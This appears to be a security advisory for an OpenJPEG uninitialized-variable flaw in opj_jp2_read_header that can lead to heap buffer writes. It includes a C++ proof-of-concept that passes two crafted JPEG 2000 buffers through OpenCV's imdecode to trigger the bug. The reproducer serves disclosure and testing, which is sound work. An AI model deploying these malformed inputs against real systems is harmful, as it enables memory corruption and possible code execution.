Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
A fix was pushed into the master branch but not yet published.
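Affected versions of this package are vulnerable to Use of Uninitialized Variable via the `opj_jp2_read_header` component when reading crafted JPEG images. By supplying specially crafted JPEG files, an attacker can achieve arbitrary heap buffer writes. The listing below is a reproducer: it passes two crafted in-memory buffers (a raw JPEG 2000 codestream and a JP2 container) through `cv::imdecode` several times in a fixed order.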
#include <opencv2/opencv.hpp>
#include <opencv2/imgcodecs/legacy/constants_c.h>
/// Runs one encoded image buffer through cv::imdecode and discards the result.
///
/// The reproducer only needs the decoder to execute; nothing inspects the
/// decoded image. cv::imdecode picks the codec from the buffer contents, so the
/// JPEG 2000 path is exercised only if OpenCV was built with a JPEG 2000 decoder.
/// NOTE(review): which JPEG 2000 backend is linked depends on the OpenCV build;
/// confirm it is the OpenJPEG one before reading a clean run as "not affected".
///
/// @param data  Start of the encoded bytes; must be readable for `size` bytes.
/// @param size  Number of bytes at `data`.
static void decode(const uint8_t* data, size_t size) {
    // cv::Mat wraps a non-const pointer, so work on a private mutable copy.
    std::vector<uint8_t> encoded(data, data + size);

    // 1 x N single-channel byte row that views the copy (no further copy made).
    const int byte_count = static_cast<int>(encoded.size());
    cv::Mat input_row(1, byte_count, CV_8UC1, encoded.data());

    // Result intentionally unused: only the decode itself matters here.
    cv::Mat result = cv::imdecode(input_row, CV_LOAD_IMAGE_UNCHANGED);
}
// Reproducer driver: decodes two hard-coded buffers through decode() in a fixed
// interleaved order (data1, data2, data2, data1, data2) and returns 0.
// The program prints nothing and checks nothing itself, so a fault is only
// visible through a crash or a memory-error detector. Build the test binary
// with AddressSanitizer, or run it under Valgrind, to check whether the linked
// library version is affected.
int main() {
// Buffer 1: raw JPEG 2000 codestream without a JP2 box wrapper. It holds SOC,
// SIZ, COD and QCD marker segments, one SOT/SOD pair, and ends with two bytes
// the author labels as an invalid marker. Field labels are the author's.
// NOTE(review): the field values look deliberately malformed (fuzzer-style);
// treat them as opaque test data and keep them byte-for-byte.
const uint8_t data1[] = {0xff,0x4f, // SOC marker
0xff,0x51, // SIZ marker
0x00,0x29, // Size with marker 41
0x01,0x05,// Rsiz (capabilities)
0x00,0x00,0x0a,0xa2, // Xsiz
0x00,0x01,0xeb,0xb8, // Ysiz
0x00,0x00,0x00,0x33, // XOsiz
0x00,0x00,0x41,0x80, // YOsiz
0x00,0x0b,0x00,0x03, // XTsiz
0x2a,0xb9,0xd1,0x4d, // YTsiz
0x00,0x00,0x00,0x21, // XTOsiz
0x00,0x00,0x0f,0xf5, // YTOsiz
0x00,0x01, // Csiz
0x07, // Ssiz_0
0x0a, // XRsiz_0
0x37, // YRsiz_0
0xff,0x52, // COD marker
0x00,0x0d, // Size with marker 13
0x05, // Scod
0x00, // SGcod (A)
0x00,0x11, // SGcod (B)
0x00, // SGcod (C)
0x00, // SPcod (D) / SPcoc (A)
0x04, // SPcod (E) / SPcoc (B)
0x04, // SPcod (F) / SPcoc (C)
0x2c, // SPcod (G) / SPcoc (D)
0x01, // SPcod (H) / SPcoc (E)
0x86, // SPcod (I_i) / SPcoc (F_i)
0xff,0x5c, // QCD marker
0x00,0x04, // Size with marker 4
0x60, // Sqcx
0xb7, // SPqcx_0
0xff,0x90, // SOT marker
0x00,0x0a, // Size with marker 10
0x00,0x00, // Isot
0x00,0x00,0x00,0x00, // Psot
0x00, // TPsot
0x76, // TNsot
0xff,0x93, // SOD marker
0x00,0x00 // last invalid marker
};
// Buffer 2: JP2 container. It holds the 12-byte signature box, a file type box
// (20 bytes) and a JP2 Header box (49 bytes) made of an Image Header box
// (22 bytes) and a Color Specification box (19 bytes). The box lengths add up
// to the whole array, so no codestream box follows the header.
const uint8_t data2[] = {0x00,0x00,0x00,0x0c,0x6a,0x50,0x20,0x20,0x0d,0x0a,0x87,0x0a, // signature
0x00,0x00,0x00,0x14, // box length 20
0x66,0x74,0x79,0x70, // box: file type
0x6a,0x70,0x30,0x20, // BR
0xf9,0xff,0xff,0xff, // MinV
0x6a,0x70,0x33,0x20, // CLi
0x00,0x00,0x00,0x31, // box length 49
0x6a,0x70,0x32,0x68, // box: JP2 Header
0x00,0x00,0x00,0x16, // box length 22
0x69,0x68,0x64,0x72, // box: Image Header
0x00,0x80,0x00,0x00, // Height
0x00,0x00,0x05,0x00, // Width
0x00,0x03, // NC (number of components)
0x07, // BPC
0x07, // C
0x00, // UnkC
0x00, // IPR
0x00,0x00,0x00,0x13, // box length 19
0x63,0x6f,0x6c,0x72, // box: Color Specification
0x02, // Meth
0xff, // PRECEDENCE
0xff, // APPROX
0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08, // icc values
};
// Fixed decode sequence; do not reorder or deduplicate the calls.
// NOTE(review): the defect is an uninitialized variable, so the outcome of one
// decode presumably depends on memory left behind by the previous ones, which
// would explain the repeated, interleaved calls. Confirm against the upstream
// fix.
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
decode(data2, sizeof(data2));
decode(data1, sizeof(data1));
decode(data2, sizeof(data2));
return 0;
}